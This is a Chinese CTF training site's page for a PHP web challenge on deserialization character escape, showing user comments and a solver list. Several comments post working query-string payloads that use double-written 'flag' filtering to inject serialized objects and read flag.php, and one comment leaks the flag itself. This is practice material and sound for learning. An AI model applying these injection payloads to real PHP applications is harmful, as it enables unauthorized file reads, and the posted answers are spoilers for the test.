逃逸WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 90
提  示:
描  述:
flag{}
评论
t1tl3d 14天前

flag{you_can_readlly_dance}

回复 0

whiteHaves 4月前

参数a负责扰乱,使序列化提前结束,参数b负责反序列化之后执行代码,注意:参数b序列化的对象是A类,但只要第二个参数的序列化结果,因为第一个参数就是参数a,不必包含,但是需要用1“结束前文;文件名的长度是8,不是12,因为文件名长度只看过滤后的结果。

回复 0

绝情且小帅 7月前

?a=flagflagflagflagflagflag &b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}}

回复 0

xiaobai568 9月前

反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php

回复 0

zhaiye 1年前

?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}

回复 0

chaoge 1年前

不容易啊

回复 0

2728462336 1年前

注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度

回复 0

hopeinhand 1年前

反序列化字符逃逸

回复 1

WriteUp

image
sean

2 金币

评分(1)

解题动态

wangdashuai 攻破了该题 2天前
dir_tree 攻破了该题 6天前
TOMCAT336699 攻破了该题 13天前
2165518579牛逼 攻破了该题 13天前
t1tl3d 攻破了该题 14天前
zzhicecyb 攻破了该题 16天前
Jokerz 攻破了该题 18天前
zxingxing121 攻破了该题 1月前
19581700609 攻破了该题 1月前
ZianTT 攻破了该题 1月前
coldplay99999 攻破了该题 1月前
YYYCC 攻破了该题 2月前
MonkeZ 攻破了该题 2月前
littlebear4 攻破了该题 2月前
fogoo 攻破了该题 2月前
极速代码 攻破了该题 4月前
POEighT 攻破了该题 4月前
whiteHaves 攻破了该题 4月前
stucky 攻破了该题 4月前
name12581 攻破了该题 5月前
问题反馈